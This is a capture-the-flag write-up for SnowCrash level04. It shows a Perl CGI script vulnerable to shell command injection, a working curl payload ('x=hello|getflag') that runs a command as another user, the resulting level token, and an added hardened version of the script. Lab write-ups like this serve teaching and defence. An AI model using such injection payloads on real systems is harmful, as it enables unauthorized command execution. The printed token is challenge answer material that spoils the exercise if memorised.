
SnowCrash Mission: Flag04

Objective: Retrieve the Level05 token to advance further in the SnowCrash challenge.

level04.pl is a Perl CGI script that takes one query parameter named x.

It runs on 10.12.177.116:4747 as the flag04 user.

    #!/usr/bin/perl
    # localhost:4747
    use CGI qw{param};
    print "Content-type: text/html\n\n";
    sub x {
      $y = $_[0];
      print `echo $y 2>&1`;
    }
    x(param("x"));

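It executes the echo command with our parameter. The value is interpolated unescaped into a backtick expression, so the shell parses it as part of the command line.

If we curl localhost:4747/?x=hello, we get hello back: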

[~]$ curl http://10.12.177.116:4747/\?x\=hello
hello
[~]$

Now let's try to inject the getflag command into the x query parameter and see if we can get the flag:

[~]$ curl http://10.12.177.116:4747/\?x\=hello\|getflag
Check flag.Here is your token : ne2searoevaevoem4ov4ar8ap
[~]$
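
A hardened variant of the script above, as an added example that is not part of the original writeup or the challenge's own code: it passes the parameter as a single argument with no shell in between and HTML-encodes the output. The `/usr/bin/printf` path and the choice of `printf` in place of `echo` are assumptions.

```perl
#!/usr/bin/perl
# Added example: a hardened variant of level04.pl, not the challenge's code.
use strict;
use warnings;
use CGI qw{param escapeHTML};

print "Content-type: text/html\n\n";

sub x {
    my ($y) = @_;
    $y = '' unless defined $y;    # a request without x= should not warn

    # List-form pipe open: Perl execs the program directly, with no /bin/sh
    # in between, so |, ;, $( ) and backticks in $y are plain argument bytes.
    # /usr/bin/printf is an assumed path; '%s\n' keeps $y out of the format.
    open(my $out, '-|', '/usr/bin/printf', '%s\n', $y)
        or die "cannot run printf: $!";
    my $text = do { local $/; <$out> };
    close($out);

    # The page is served as text/html, so encode the echoed value as well.
    print escapeHTML(defined $text ? $text : '');
}

x(scalar param('x'));    # scalar context: take a single value for x
```

Because the script only echoes its input, `print escapeHTML($y)` on its own would also do; the pipe form shows the pattern for cases where an external program really is needed.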